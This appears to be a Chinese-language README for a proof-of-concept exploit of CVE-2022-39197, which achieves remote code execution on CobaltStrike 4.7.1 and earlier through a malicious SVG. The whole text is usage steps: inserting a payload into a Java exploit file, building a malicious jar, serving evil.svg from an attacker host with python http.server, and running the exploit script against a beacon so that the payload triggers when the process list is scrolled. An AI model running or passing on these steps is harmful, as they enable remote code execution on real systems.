
针对 CVE-2022-39197 的概念验证漏洞利用,可通过经 HTTP 分发的恶意 SVG 载荷对 CobaltStrike <= 4.7.1 实现远程代码执行。
EvilJar/src/main/java/Exploit.java 中编辑第 19 行,填入你的 Payloadmvn clean compile assembly:singleEvilJar/target/ 目录下的 EvilJar-1.0-jar-with-dependencies.jar 移动到 serve/ 文件夹serve\evil.svg,将 [attacker] 替换为你的地址python3 -m http.server 8080 启动服务python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
当用户滚动进程列表时,Payload 将被触发
